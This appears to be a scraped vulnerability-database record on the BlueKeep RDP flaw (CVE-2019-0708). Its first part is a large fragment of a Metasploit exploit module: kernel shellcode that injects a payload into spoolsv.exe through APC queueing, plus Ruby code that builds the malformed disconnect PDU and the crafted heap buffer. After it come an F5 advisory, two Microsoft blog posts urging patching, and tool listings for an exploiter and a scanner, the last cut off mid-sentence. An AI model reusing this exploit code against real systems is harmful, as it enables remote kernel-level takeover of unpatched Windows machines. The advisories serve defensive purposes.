0x10\n_find_eprocess_threadlist_offset_win7:\n lea rdx, [rax+0x28] ; edx = offset of EPROCESS.ThreadListHead\n\n ;======================================\n ; find offset of ETHREAD.ThreadListEntry\n ;======================================\n\n lea r8, [rcx+rdx] ; r8 = address of EPROCESS.ThreadListHead\n mov r9, r8\n\n ; ETHREAD.ThreadListEntry must be between ETHREAD (r14) and ETHREAD+0x700\n_find_ethread_threadlist_offset_loop:\n mov r9, qword [r9]\n\n cmp r8, r9 ; check end of list\n je _insert_queue_apc_done ; not found !!!\n\n ; if (r9 - r14 < 0x700) found\n mov rax, r9\n sub rax, r14\n cmp rax, 0x700\n ja _find_ethread_threadlist_offset_loop\n sub r14, r9 ; r14 = -(offset of ETHREAD.ThreadListEntry)\n\n\n ;======================================\n ; find offset of EPROCESS.ActiveProcessLinks\n ;======================================\n mov edi, #{psgetprocessid_hash}\n call get_proc_addr\n mov edi, dword [rax+3] ; get offset from code (offset of UniqueProcessId is always > 0x7f)\n add edi, 8 ; edi = offset of EPROCESS.ActiveProcessLinks = offset of EPROCESS.UniqueProcessId + sizeof(EPROCESS.UniqueProcessId)\n\n\n ;======================================\n ; find target process by iterating over EPROCESS.ActiveProcessLinks WITHOUT lock\n ;======================================\n ; check process name\n\n\n xor eax, eax ; HACK to exit earlier if process not found\n\n_find_target_process_loop:\n lea rsi, [rcx+rbx]\n\n push rax\n call calc_hash\n cmp eax, #{spoolsv_exe_hash} ; \"spoolsv.exe\"\n pop rax\n jz found_target_process\n\n;---------- HACK PROCESS NOT FOUND start -----------\n inc rax\n cmp rax, 0x300 ; HACK not found!\n jne _next_find_target_process\n xor ecx, ecx\n ; clear queueing kapc flag, allow other hijacked system call to run shellcode\n mov byte [rbp+#{data_queueing_kapc_offset}], cl\n\n jmp _r3_to_r0_done\n\n;---------- HACK PROCESS NOT FOUND end -----------\n\n_next_find_target_process:\n ; next process\n mov rcx, [rcx+rdi]\n sub rcx, rdi\n jmp _find_target_process_loop\n\n\nfound_target_process:\n ; The allocation for userland payload will be in KernelApcRoutine.\n ; KernelApcRoutine is run in a target process context. So no need to use KeStackAttachProcess()\n\n ;======================================\n ; save process PEB for finding CreateThread address in kernel KAPC routine\n ;======================================\n mov edi, #{psgetprocesspeb_hash}\n ; rcx is EPROCESS. no need to set it.\n call win_api_direct\n mov [rbp+#{data_peb_addr_offset}], rax\n\n\n ;======================================\n ; iterate ThreadList until KeInsertQueueApc() success\n ;======================================\n ; r15 = nt\n ; r14 = -(offset of ETHREAD.ThreadListEntry)\n ; rcx = EPROCESS\n ; edx = offset of EPROCESS.ThreadListHead\n\n\n lea rsi, [rcx + rdx] ; rsi = ThreadListHead address\n mov rbx, rsi ; use rbx for iterating thread\n\n ; checking alertable from ETHREAD structure is not reliable because each Windows version has different offset.\n ; Moreover, alertable thread need to be waiting state which is more difficult to check.\n ; try queueing APC then check KAPC member is more reliable.\n\n_insert_queue_apc_loop:\n ; move backward because non-alertable and NULL TEB.ActivationContextStackPointer threads always be at front\n mov rbx, [rbx+8]\n\n cmp rsi, rbx\n je _insert_queue_apc_loop ; skip list head\n\n ; find start of ETHREAD address\n ; set it to rdx to be used for KeInitializeApc() argument too\n lea rdx, [rbx + r14] ; ETHREAD\n\n ; userland shellcode (at least CreateThread() function) need non NULL TEB.ActivationContextStackPointer.\n ; the injected process will be crashed because of access violation if TEB.ActivationContextStackPointer is NULL.\n ; Note: APC routine does not require non-NULL TEB.ActivationContextStackPointer.\n ; from my observation, KTRHEAD.Queue is always NULL when TEB.ActivationContextStackPointer is NULL.\n ; Teb member is next to Queue member.\n mov edi, #{psgetthreadteb_hash}\n call get_proc_addr\n mov eax, dword [rax+3] ; get offset from code (offset of Teb is always > 0x7f)\n cmp qword [rdx+rax-8], 0 ; KTHREAD.Queue MUST not be NULL\n je _insert_queue_apc_loop\n\n ; KeInitializeApc(PKAPC,\n ; PKTHREAD,\n ; KAPC_ENVIRONMENT = OriginalApcEnvironment (0),\n ; PKKERNEL_ROUTINE = kernel_apc_routine,\n ; PKRUNDOWN_ROUTINE = NULL,\n ; PKNORMAL_ROUTINE = userland_shellcode,\n ; KPROCESSOR_MODE = UserMode (1),\n ; PVOID Context);\n lea rcx, [rbp+#{data_kapc_offset}] ; PAKC\n xor r8, r8 ; OriginalApcEnvironment\n lea r9, [rel kernel_kapc_routine] ; KernelApcRoutine\n push rbp ; context\n push 1 ; UserMode\n push rbp ; userland shellcode (MUST NOT be NULL)\n push r8 ; NULL\n sub rsp, 0x20 ; shadow stack\n mov edi, #{keinitializeapc_hash}\n call win_api_direct\n ; Note: KeInsertQueueApc() requires shadow stack. Adjust stack back later\n\n ; BOOLEAN KeInsertQueueApc(PKAPC, SystemArgument1, SystemArgument2, 0);\n ; SystemArgument1 is second argument in usermode code (rdx)\n ; SystemArgument2 is third argument in usermode code (r8)\n lea rcx, [rbp+#{data_kapc_offset}]\n ;xor edx, edx ; no need to set it here\n ;xor r8, r8 ; no need to set it here\n xor r9, r9\n mov edi, #{keinsertqueueapc_hash}\n call win_api_direct\n add rsp, 0x40\n ; if insertion failed, try next thread\n test eax, eax\n jz _insert_queue_apc_loop\n\n mov rax, [rbp+#{data_kapc_offset}+0x10] ; get KAPC.ApcListEntry\n ; EPROCESS pointer 8 bytes\n ; InProgressFlags 1 byte\n ; KernelApcPending 1 byte\n ; if success, UserApcPending MUST be 1\n cmp byte [rax+0x1a], 1\n je _insert_queue_apc_done\n\n ; manual remove list without lock\n mov [rax], rax\n mov [rax+8], rax\n jmp _insert_queue_apc_loop\n\n_insert_queue_apc_done:\n ; The PEB address is needed in kernel_apc_routine. Setting QUEUEING_KAPC to 0 should be in kernel_apc_routine.\n\n_r3_to_r0_done:\n pop rax\n pop rbx\n pop rsi\n pop rdi\n pop r14\n pop r15\n ret\n\n;========================================================================\n; Call function in specific module\n;\n; All function arguments are passed as calling normal function with extra register arguments\n; Extra Arguments: r15 = module pointer\n; edi = hash of target function name\n;========================================================================\nwin_api_direct:\n call get_proc_addr\n jmp rax\n\n\n;========================================================================\n; Get function address in specific module\n;\n; Arguments: r15 = module pointer\n; edi = hash of target function name\n; Return: eax = offset\n;========================================================================\nget_proc_addr:\n ; Save registers\n push rbx\n push rcx\n push rsi ; for using calc_hash\n\n ; use rax to find EAT\n mov eax, dword [r15+60] ; Get PE header e_lfanew\n mov eax, dword [r15+rax+136] ; Get export tables RVA\n\n add rax, r15\n push rax ; save EAT\n\n mov ecx, dword [rax+24] ; NumberOfFunctions\n mov ebx, dword [rax+32] ; FunctionNames\n add rbx, r15\n\n_get_proc_addr_get_next_func:\n ; When we reach the start of the EAT (we search backwards), we hang or crash\n dec ecx ; decrement NumberOfFunctions\n mov esi, dword [rbx+rcx*4] ; Get rva of next module name\n add rsi, r15 ; Add the modules base address\n\n call calc_hash\n\n cmp eax, edi ; Compare the hashes\n jnz _get_proc_addr_get_next_func ; try the next function\n\n_get_proc_addr_finish:\n pop rax ; restore EAT\n mov ebx, dword [rax+36]\n add rbx, r15 ; ordinate table virtual address\n mov cx, word [rbx+rcx*2] ; desired functions ordinal\n mov ebx, dword [rax+28] ; Get the function addresses table rva\n add rbx, r15 ; Add the modules base address\n mov eax, dword [rbx+rcx*4] ; Get the desired functions RVA\n add rax, r15 ; Add the modules base address to get the functions actual VA\n\n pop rsi\n pop rcx\n pop rbx\n ret\n\n;========================================================================\n; Calculate ASCII string hash. Useful for comparing ASCII string in shellcode.\n;\n; Argument: rsi = string to hash\n; Clobber: rsi\n; Return: eax = hash\n;========================================================================\ncalc_hash:\n push rdx\n xor eax, eax\n cdq\n_calc_hash_loop:\n lodsb ; Read in the next byte of the ASCII string\n ror edx, 13 ; Rotate right our hash value\n add edx, eax ; Add the next byte of the string\n test eax, eax ; Stop when found NULL\n jne _calc_hash_loop\n xchg edx, eax\n pop rdx\n ret\n\n\n; KernelApcRoutine is called when IRQL is APC_LEVEL in (queued) Process context.\n; But the IRQL is simply raised from PASSIVE_LEVEL in KiCheckForKernelApcDelivery().\n; Moreover, there is no lock when calling KernelApcRoutine.\n; So KernelApcRoutine can simply lower the IRQL by setting cr8 register.\n;\n; VOID KernelApcRoutine(\n; IN PKAPC Apc,\n; IN PKNORMAL_ROUTINE *NormalRoutine,\n; IN PVOID *NormalContext,\n; IN PVOID *SystemArgument1,\n; IN PVOID *SystemArgument2)\nkernel_kapc_routine:\n push rbp\n push rbx\n push rdi\n push rsi\n push r15\n\n mov rbp, [r8] ; *NormalContext is our data area pointer\n\n mov r15, [rbp+#{data_nt_kernel_addr_offset}]\n push rdx\n pop rsi ; mov rsi, rdx\n mov rbx, r9\n\n ;======================================\n ; ZwAllocateVirtualMemory(-1, &baseAddr, 0, &0x1000, 0x1000, 0x40)\n ;======================================\n xor eax, eax\n mov cr8, rax ; set IRQL to PASSIVE_LEVEL (ZwAllocateVirtualMemory() requires)\n ; rdx is already address of baseAddr\n mov [rdx], rax ; baseAddr = 0\n mov ecx, eax\n not rcx ; ProcessHandle = -1\n mov r8, rax ; ZeroBits\n mov al, 0x40 ; eax = 0x40\n push rax ; PAGE_EXECUTE_READWRITE = 0x40\n shl eax, 6 ; eax = 0x40 << 6 = 0x1000\n push rax ; MEM_COMMIT = 0x1000\n ; reuse r9 for address of RegionSize\n mov [r9], rax ; RegionSize = 0x1000\n sub rsp, 0x20 ; shadow stack\n mov edi, #{zwallocatevirtualmemory_hash}\n call win_api_direct\n add rsp, 0x30\n\n ; check error\n test eax, eax\n jnz _kernel_kapc_routine_exit\n\n ;======================================\n ; copy userland payload\n ;======================================\n mov rdi, [rsi]\n\n;--------------------------- HACK IN EGG USER ---------\n\n push rdi\n\n lea rsi, [rel shellcode_start]\n mov rdi, 0x#{USERMODE_EGG.to_s(16)}\n\n _find_user_egg_loop:\n sub rsi, 0x#{CHUNK_SIZE.to_s(16)}\n mov rax, [rsi - 8]\n cmp rax, rdi\n jnz _find_user_egg_loop\n\n _inner_find_user_egg_loop:\n inc rsi\n mov rax, [rsi - 8]\n cmp rax, rdi\n jnz _inner_find_user_egg_loop\n\n pop rdi\n;--------------------------- END HACK EGG USER ------------\n\n mov ecx, 0x380 ; fix payload size to 0x380 bytes\n\n rep movsb\n\n ;======================================\n ; find CreateThread address (in kernel32.dll)\n ;======================================\n mov rax, [rbp+#{data_peb_addr_offset}]\n mov rax, [rax + 0x18] ; PEB->Ldr\n mov rax, [rax + 0x20] ; InMemoryOrder list\n\n ;lea rsi, [rcx + rdx] ; rsi = ThreadListHead address\n ;mov rbx, rsi ; use rbx for iterating thread\n_find_kernel32_dll_loop:\n mov rax, [rax] ; first one always be executable\n ; offset 0x38 (WORD) => must be 0x40 (full name len c:\\windows\\system32\\kernel32.dll)\n ; offset 0x48 (WORD) => must be 0x18 (name len kernel32.dll)\n ; offset 0x50 => is name\n ; offset 0x20 => is dllbase\n ;cmp word [rax+0x38], 0x40\n ;jne _find_kernel32_dll_loop\n cmp word [rax+0x48], 0x18\n jne _find_kernel32_dll_loop\n\n mov rdx, [rax+0x50]\n ; check only \"32\" because name might be lowercase or uppercase\n cmp dword [rdx+0xc], 0x00320033 ; 3\\x002\\x00\n jnz _find_kernel32_dll_loop\n\n mov r15, [rax+0x20]\n mov edi, #{createthread_hash}\n call get_proc_addr\n\n ; save CreateThread address to SystemArgument1\n mov [rbx], rax\n\n_kernel_kapc_routine_exit:\n xor ecx, ecx\n ; clear queueing kapc flag, allow other hijacked system call to run shellcode\n mov byte [rbp+#{data_queueing_kapc_offset}], cl\n ; restore IRQL to APC_LEVEL\n mov cl, 1\n mov cr8, rcx\n\n pop r15\n pop rsi\n pop rdi\n pop rbx\n pop rbp\n ret\n\nuserland_start_thread:\n ; CreateThread(NULL, 0, &threadstart, NULL, 0, NULL)\n xchg rdx, rax ; rdx is CreateThread address passed from kernel\n xor ecx, ecx ; lpThreadAttributes = NULL\n push rcx ; lpThreadId = NULL\n push rcx ; dwCreationFlags = 0\n mov r9, rcx ; lpParameter = NULL\n lea r8, [rel userland_payload] ; lpStartAddr\n mov edx, ecx ; dwStackSize = 0\n sub rsp, 0x20\n call rax\n add rsp, 0x30\n ret\n\nuserland_payload:\n ^\n\n [\n KERNELMODE_EGG,\n assemble_with_fixups(asm)\n ].pack('<Qa*')\n end\n\n def create_free_trigger(chan_user_id, chan_id)\n # malformed Disconnect Provider Indication PDU (opcode: 0x2, total_size != 0x20)\n vprint_status(\"Creating free trigger for user #{chan_user_id} on channel #{chan_id}\")\n # The extra bytes on the end of the body is what causes the bad things to happen\n body = \"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x02\" + \"\\x00\" * 22\n rdp_create_channel_msg(chan_user_id, chan_id, body, 3, 0xFFFFFFF)\n end\n\n def create_exploit_channel_buffer(target_addr)\n overspray_addr = target_addr + 0x2000\n shellcode_vtbl = target_addr + HEADER_SIZE\n magic_value1 = overspray_addr + 0x810\n magic_value2 = overspray_addr + 0x48\n magic_value3 = overspray_addr + CHUNK_SIZE + HEADER_SIZE\n\n # first 0x38 bytes are used by DATA PDU packet\n # exploit channel starts at +0x38, which is +0x20 of an _ERESOURCE\n # http://www.tssc.de/winint/Win10_17134_ntoskrnl/_ERESOURCE.htm\n [\n [\n # SystemResourceList (2 pointers, each 8 bytes)\n # Pointer to OWNER_ENTRY (8 bytes)\n # ActiveCount (SHORT, 2 bytes)\n # Flag (WORD, 2 bytes)\n # Padding (BYTE[4], 4 bytes) x64 only\n 0x0, # SharedWaters (Pointer to KSEMAPHORE, 8 bytes)\n 0x0, # ExclusiveWaiters (Pointer to KSEVENT, 8 bytes)\n magic_value2, # OwnerThread (ULONG, 8 bytes)\n magic_value2, # TableSize (ULONG, 8 bytes)\n 0x0, # ActiveEntries (DWORD, 4 bytes)\n 0x0, # ContenttionCount (DWORD, 4 bytes)\n 0x0, # NumberOfSharedWaiters (DWORD, 4 bytes)\n 0x0, # NumberOfExclusiveWaiters (DWORD, 4 bytes)\n 0x0, # Reserved2 (PVOID, 8 bytes) x64 only\n magic_value2, # Address (PVOID, 8 bytes)\n 0x0, # SpinLock (UINT_PTR, 8 bytes)\n ].pack('<Q<Q<Q<Q<L<L<L<L<Q<Q<Q'),\n [\n magic_value2, # SystemResourceList (2 pointers, each 8 bytes)\n magic_value2, # --------------------\n 0x0, # Pointer to OWNER_ENTRY (8 bytes)\n 0x0, # ActiveCount (SHORT, 2 bytes)\n 0x0, # Flag (WORD, 2 bytes)\n 0x0, # Padding (BYTE[4], 4 bytes) x64 only\n 0x0, # SharedWaters (Pointer to KSEMAPHORE, 8 bytes)\n 0x0, # ExclusiveWaiters (Pointer to KSEVENT, 8 bytes)\n magic_value2, # OwnerThread (ULONG, 8 bytes)\n magic_value2, # TableSize (ULONG, 8 bytes)\n 0x0, # ActiveEntries (DWORD, 4 bytes)\n 0x0, # ContenttionCount (DWORD, 4 bytes)\n 0x0, # NumberOfSharedWaiters (DWORD, 4 bytes)\n 0x0, # NumberOfExclusiveWaiters (DWORD, 4 bytes)\n 0x0, # Reserved2 (PVOID, 8 bytes) x64 only\n magic_value2, # Address (PVOID, 8 bytes)\n 0x0, # SpinLock (UINT_PTR, 8 bytes)\n ].pack('<Q<Q<Q<S<S<L<Q<Q<Q<Q<L<L<L<L<Q<Q<Q'),\n [\n 0x1F, # ClassOffset (DWORD, 4 bytes)\n 0x0, # bindStatus (DWORD, 4 bytes)\n 0x72, # lockCount1 (QWORD, 8 bytes)\n magic_value3, # connection (QWORD, 8 bytes)\n shellcode_vtbl, # shellcode vtbl ? (QWORD, 8 bytes)\n 0x5, # channelClass (DWORD, 4 bytes)\n \"MS_T120\\x00\".encode('ASCII'), # channelName (BYTE[8], 8 bytes)\n 0x1F, # channelIndex (DWORD, 4 bytes)\n magic_value1, # channels (QWORD, 8 bytes)\n magic_value1, # connChannelsAddr (POINTER, 8 bytes)\n magic_value1, # list1 (QWORD, 8 bytes)\n magic_value1, # list1 (QWORD, 8 bytes)\n magic_value1, # list2 (QWORD, 8 bytes)\n magic_value1, # list2 (QWORD, 8 bytes)\n 0x65756c62, # inputBufferLen (DWORD, 4 bytes)\n 0x7065656b, # inputBufferLen (DWORD, 4 bytes)\n magic_value1, # connResrouce (QWORD, 8 bytes)\n 0x65756c62, # lockCount158 (DWORD, 4 bytes)\n 0x7065656b, # dword15C (DWORD, 4 bytes)\n ].pack('<L<L<Q<Q<Q<La*<L<Q<Q<Q<Q<Q<Q<L<L<Q<L<L')\n ].join('')\n end\n\nend\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/windows/rdp/cve_2019_0708_bluekeep_rce.rb"}], "f5": [{"lastseen": "2020-04-06T22:40:29", "bulletinFamily": "software", "cvelist": ["CVE-2019-0708"], "description": "\nF5 Product Development has evaluated the currently supported releases for potential vulnerability, and no F5 products were found to be vulnerable.\n\nNone\n\n * [K51812227: Understanding Security Advisory versioning](<https://support.f5.com/csp/article/K51812227>)\n * [K41942608: Overview of AskF5 Security Advisory articles](<https://support.f5.com/csp/article/K41942608>)\n * [K4602: Overview of the F5 security vulnerability response policy](<https://support.f5.com/csp/article/K4602>)\n * [K9970: Subscribing to email notifications regarding F5 products](<https://support.f5.com/csp/article/K9970>)\n * [K9957: Creating a custom RSS feed to view new and updated documents](<https://support.f5.com/csp/article/K9957>)\n", "edition": 1, "modified": "2019-06-03T22:04:00", "published": "2019-05-16T06:43:00", "id": "F5:K25238311", "href": "https://support.f5.com/csp/article/K25238311", "title": "Microsoft Remote Desktop Services Remote Code Execution vulnerability CVE-2019-0708", "type": "f5", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "msrc": [{"lastseen": "2019-05-29T14:32:00", "bulletinFamily": "blog", "cvelist": ["CVE-2019-0708"], "description": "Today Microsoft released fixes for a critical Remote Code Execution vulnerability, [CVE-2019-0708](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-0708>), in Remote Desktop Services \u2013 formerly known as Terminal Services \u2013 that affects some older versions of Windows. The Remote Desktop Protocol (RDP) itself is not vulnerable. This vulnerability is pre-authentication and requires no user interaction. In other words, the vulnerability is \u2018wormable\u2019, meaning that any future malware that exploits this vulnerability could propagate from vulnerable computer to vulnerable computer in a similar way as the _WannaCry_ malware spread across the globe in 2017. While we have observed no exploitation of this vulnerability, it is highly likely that malicious actors will write an exploit for this vulnerability and incorporate it into their malware. \n\nNow that I have your attention, it is important that affected systems are patched as quickly as possible to prevent such a scenario from happening. In response, we are taking the unusual step of providing a security update for all customers to protect Windows platforms, including some out-of-support versions of Windows. \n\nVulnerable in-support systems include Windows 7, Windows Server 2008 R2, and Windows Server 2008. Downloads for in-support versions of Windows can be found in the [Microsoft Security Update Guide](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-0708>). Customers who use an in-support version of Windows and have automatic updates enabled are automatically protected. \n\nOut-of-support systems include Windows 2003 and Windows XP. If you are on an out-of-support version, the best way to address this vulnerability is to upgrade to the latest version of Windows. Even so, we are making fixes available for these out-of-support versions of Windows in [KB4500705](<https://support.microsoft.com/help/4500705>). \n\nCustomers running Windows 8 and Windows 10 are not affected by this vulnerability, and it is no coincidence that later versions of Windows are unaffected. Microsoft invests heavily in strengthening the security of its products, often through major architectural improvements that are not possible to backport to earlier versions of Windows. \n\nThere is partial mitigation on affected systems that have [Network Level Authentication (NLA)](<https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2008-R2-and-2008/cc732713\\(v=ws.11\\)>) enabled. The affected systems are mitigated against \u2018wormable\u2019 malware or advanced malware threats that could exploit the vulnerability, as NLA requires authentication before the vulnerability can be triggered. However, affected systems are still vulnerable to Remote Code Execution (RCE) exploitation if the attacker has valid credentials that can be used to successfully authenticate. \n\nIt is for these reasons that we strongly advise that all affected systems \u2013 irrespective of whether NLA is enabled or not \u2013 should be updated as soon as possible. \n\n**Resources** \n[Links to downloads for Windows 7, Windows 2008 R2, and Windows 2008 \n](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-0708>)[Links to downloads for Windows 2003 and Windows XP](<https://support.microsoft.com/help/4500705>)_ _\n\n_Simon Pope__, __Director of Incident Response__, __Microsoft Security Response Center (MSRC_)", "modified": "2019-05-14T17:05:03", "published": "2019-05-14T17:05:03", "id": "MSRC:6A6ED6A5B652378DCBA3113B064E973B", "href": "https://blogs.technet.microsoft.com/msrc/2019/05/14/prevent-a-worm-by-updating-remote-desktop-services-cve-2019-0708/", "type": "msrc", "title": "Prevent a worm by updating Remote Desktop Services (CVE-2019-0708)", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-07-09T03:34:06", "bulletinFamily": "blog", "cvelist": ["CVE-2019-0708"], "description": "On May 14, Microsoft released fixes for a critical Remote Code Execution vulnerability, [CVE-2019-0708](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-0708>), in Remote Desktop Services \u2013 formerly known as Terminal Services \u2013 that affects some older versions of Windows. In our [previous blog post](<https://blogs.technet.microsoft.com/msrc/2019/05/14/prevent-a-worm-by-updating-remote-desktop-services-cve-2019-0708/>) on this topic we warned that the vulnerability is \u2018wormable\u2019, and that future malware that exploits this vulnerability could propagate from vulnerable computer to vulnerable computer in a similar way as the WannaCry malware spread across the globe in 2017.\n\nMicrosoft is confident that an exploit exists for this vulnerability, and if [recent reports](<https://blog.erratasec.com/2019/05/almost-one-million-vulnerable-to.html>) are accurate, _nearly one million computers connected directly to the internet are __still __vulnerable to CVE-2019-0708_. Many more within corporate networks may also be vulnerable. It only takes one vulnerable computer connected to the internet to provide a potential gateway into these corporate networks, where advanced malware could spread, infecting computers across the enterprise. This scenario could be even worse for those who have not kept their internal systems updated with the latest fixes, as any future malware may also attempt further exploitation of vulnerabilities that have already been fixed.\n\nIt's been only two weeks since the fix was released and there has been no sign of a worm yet. This does not mean that we\u2019re out of the woods. If we look at the events leading up to the start of the WannaCry attacks, they serve to inform the risks of not applying fixes for this vulnerability in a timely manner.\n\n**Our recommendation remains the same. We strongly advise that all affected systems should be updated as soon as possible.**\n\nIt is possible that we won\u2019t see this vulnerability incorporated into malware.\n\nBut that\u2019s not the way to bet.\n\n \n\n**EternalBlue Timeline**\n\nAlmost two months passed between the release of fixes for the EternalBlue vulnerability and when ransomware attacks began. Despite having nearly 60 days to patch their systems, many customers had not.\n\nA significant number of these customers were infected by the ransomware.\n\n**March 14, 2017: **Microsoft releases[ security bulletin MS17-010](<https://docs.microsoft.com/en-us/security-updates/SecurityBulletins/2017/ms17-010>) which includes fixes for a set of SMBv1 vulnerabilities.\n\n**April 14 2017: **[ShadowBrokers publicly releases a set of exploits](<https://blogs.technet.microsoft.com/msrc/2017/04/14/protecting-customers-and-evaluating-risk/>), including a wormable exploit known as 'EternalBlue' that leverage these SMBv1 vulnerabilities.\n\n**May 12, 2017: **[The EternalBlue exploit is used in ransomware attacks known as WannaCry](<https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/>). Hundreds of thousands of vulnerable computers across the globe are infected.\n\n \n\n**Resources** \n[Links to downloads for Windows 7, Windows 2008 R2, and Windows 2008 \n](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-0708>)[Links to downloads for Windows Vista, Windows 2003 and Windows XP](<https://support.microsoft.com/help/4500705>)_ _\n\n_Simon Pope, Director of Incident Response, Microsoft Security Response Center (MSRC_)", "modified": "2019-05-31T05:53:28", "published": "2019-05-31T05:53:28", "id": "MSRC:4D3D99779455BE99499289F3B3A35F84", "href": "https://blogs.technet.microsoft.com/msrc/2019/05/30/a-reminder-to-update-your-systems-to-prevent-a-worm/", "type": "msrc", "title": "A Reminder to Update Your Systems to Prevent a Worm", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "kitploit": [{"lastseen": "2020-12-08T05:23:44", "bulletinFamily": "tools", "cvelist": ["CVE-2019-0708"], "description": "[  ](<https://1.bp.blogspot.com/-qZPJhRorVMI/XZq0ctzzFKI/AAAAAAAAQik/H4F3k-V5m3s3fUtxBbpoR_TKVpi5Vp2gwCNcBGAsYHQ/s1600/ispy_1.png>)\n\n \nispy : Eternalblue(ms17-010)/Bluekeep(CVE-2019-0708) [ Scanner ](<https://www.kitploit.com/search/label/Scanner> \"Scanner\" ) and exploiter ( [ Metasploit ](<https://www.kitploit.com/search/label/Metasploit> \"Metasploit\" ) [ automation ](<https://www.kitploit.com/search/label/Automation> \"automation\" ) ) \n \n** How to install : ** \n\n \n \n git clone https://github.com/Cyb0r9/ispy.git\n cd ispy\n chmod +x setup.sh\n ./setup.sh\n\n \n** Screenshots : ** \n \n\n\n[  ](<https://1.bp.blogspot.com/-HQs7rcHIQxM/XZq0mM6aJQI/AAAAAAAAQio/6S3e2ulFtdgBw8-HT28BMkiqIxzT3T70ACNcBGAsYHQ/s1600/ispy_2.png>)\n\n \n\n\n[  ](<https://1.bp.blogspot.com/-tKdxGMv8vjM/XZq0mfcIx3I/AAAAAAAAQis/it_vb80HgNQu-hiz3763YkbD2FZGBj06QCNcBGAsYHQ/s1600/ispy_3.png>)\n\n \n\n\n[  ](<https://1.bp.blogspot.com/-rCLDAx1_XIk/XZq0mcy3KNI/AAAAAAAAQiw/UUWZ7-uF9dMsUcqLEFBmFEGWTs2RMJyjQCNcBGAsYHQ/s1600/ispy_4.png>)\n\n \n\n\n[  ](<https://1.bp.blogspot.com/-sQ1Rj5Qcj9k/XZq0nHBDLzI/AAAAAAAAQi0/UlQ0mARnB7AVE6pNRbGV3IrGNg3eUw2WQCNcBGAsYHQ/s1600/ispy_5.png>)\n\n \n \n** Tested On : ** \n\n\n * Parrot OS \n * Kali linux \n \n** Tutorial ( How to use ispy ) ** \n \n\n\n \n** info ** \n\n\n * GitHub profile : [ https://github.com/Cyb0r9 ](<https://github.com/Cyb0r9> \"https://github.com/Cyb0r9\" )\n * YouTbue channel: [ https://youtube.com/c/Cyborg_TN ](<https://youtube.com/c/Cyborg_TN> \"https://youtube.com/c/Cyborg_TN\" )\n * Ask Fm (ask me): [ https://ask.fm/Cyborg_TN ](<https://ask.fm/Cyborg_TN> \"https://ask.fm/Cyborg_TN\" )\n * E-mail address : [email protected] \n \n** Disclaimer : ** \n \n** usage of ispy for attacking targets without prior mutual consent is illegal. ** \n** ispy is for security [ testing ](<https://www.kitploit.com/search/label/Testing> \"testing\" ) purposes only ** \n \n \n\n\n** [ Download Ispy ](<https://github.com/Cyb0r9/ispy> \"Download Ispy\" ) **\n", "edition": 176, "modified": "2019-10-09T21:00:10", "published": "2019-10-09T21:00:10", "id": "KITPLOIT:4482238198881011483", "href": "http://www.kitploit.com/2019/10/ispy-eternalblue-ms17-010-bluekeep-cve.html", "title": "Ispy - Eternalblue (MS17-010) / Bluekeep (CVE-2019-0708) Scanner And Exploit", "type": "kitploit", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-12-08T15:24:28", "bulletinFamily": "tools", "cvelist": ["CVE-2019-0708"], "description": "[  ](<https://1.bp.blogspot.com/-AXPv9x_hlIY/XQnJG2GfqKI/AAAAAAAAPWs/DOe7OHqDWd4ph2U3_ECeWZJGFJ8ZrEQXQCLcBGAs/s1600/rdpscan.jpg>)\n\n \n\n\nThis is a quick-and-dirty scanner for the CVE-2019-0708 [ vulnerability ](<https://www.kitploit.com/search/label/Vulnerability> \"vulnerability\" ) in [ Microsoft ](<https://www.kitploit.com/search/label/Microsoft> \"Microsoft\" ) Remote Desktop. Right now, there are about 900,000 machines on the public Internet [ vulnerable ](<https://www.kitploit.com/search/label/Vulnerable> \"vulnerable\" ) to this vulnerability, so many are to expect a worm soon like WannaCry and notPetya. Therefore, scan your networks and patch (or at least, enable NLA) on vulnerable systems. \n\nThis is a command-line tool. You can download the source and compile it yourself, or you can download one of the pre-compiled binaries for Windows or macOS from the link above. \n\nThis tool is based entirely on the ` rdesktop ` patch from [ https://github.com/zerosum0x0/CVE-2019-0708 ](<https://github.com/zerosum0x0/CVE-2019-0708> \"https://github.com/zerosum0x0/CVE-2019-0708\" ) . \n\n \n** Primary use ** \nTo scan a network, run it like the following: \n\n \n \n rdpscan 192.168.1.1-192.168.1.255\n\nThis produces one of 3 results for each address: \n\n\n * SAFE - if target has determined bot be _ patched _ or at least require _ CredSSP/NLA _\n * VULNERABLE - if the target has been confirmed to be vulnerable \n * UNKNOWN - if the target doesn't respond or has some protocol failure \nWhen nothing exists at a target IP address, the older versions pritned the message \" _ UNKNOWN - connection timed out _ \". When scanning large networks, this produces an overload of too much information about systems you don't care about. Therefore, the new version by default doesn't produce this information unless you add _ -v _ (for verbose) on the command-line. \nYou can increase the speed at which it scans large networks by increasing the number of workers: \n\n \n \n rdpscan --workers 10000 10.0.0.0/8\n\nHowever, on my computer, it only produces about 1500 workers, because of system limitations, no matter how high I configure this parameter. \nYou can increase the speed even more by using this in conjunction with ` masscan ` , described in the second below. \n \n** Interpreting the results ** \nThere are three general responses: \n\n\n * _ SAFE _ \\- which means the target is probably patched or otherwise not vulnerable to the bug. \n * _ VULNERABLE _ : which means we've confirmed the target is vulnerable to this bug, and that when the worm hits, will likely get infected. \n * _ UNKNOWN _ : means we can't confirm either way, usually because the target doesn't respond or isn't running RDP, which is the vast majority of responses. Also, when targets are out of resources or experiencing network problems, we'll get a lot of these. Finally, protocol errors are responsble for a lot. While the three main responses are _ SAFE _ , _ VULNERABLE _ , and _ UNKNOWN _ , they contain additional text explaining the diagnosis. This section describes the various strings 